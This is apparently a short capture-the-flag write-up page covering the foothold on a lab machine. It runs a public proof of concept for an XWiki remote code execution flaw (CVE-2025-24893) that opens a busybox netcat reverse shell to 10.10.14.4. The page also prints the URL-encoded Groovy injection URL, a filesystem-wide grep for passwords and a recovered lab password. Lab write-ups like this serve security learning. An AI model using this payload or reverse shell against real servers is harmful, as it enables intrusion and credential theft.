Foothold

Simple Client Management System 1.0 - Remote Code Execution (RCE)Exploit Database

GitHub - gunzf0x/CVE-2025-24893: PoC for CVE-2025-24893: XWiki' Remote Code Execution exploit for versions prior to 15.10.11, 16.4.1 and 16.5.0RC1.GitHub

❯ python CVE-2025-24893.py -t http://wiki.editor.htb:8080 -c 'busybox nc 10.10.14.4 443 -e sh'
[*] Attacking http://wiki.editor.htb:8080
[*] Injecting the payload:
http://wiki.editor.htb:8080/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7D%22busybox%20nc%2010.10.14.4%20443%20-e%20sh%22.execute%28%29%7B%7B/groovy%7D%7D%7B%7B/async%7D%7D
[*] Command executed

~Happy Hacking

grep --color=auto -rnw '/' -ie "PASSWORD" --color=always 2> /dev/null

theEd1t0rTeam99

Previous8080 NextPriv Esc

Last updated 2 months ago

Was this helpful?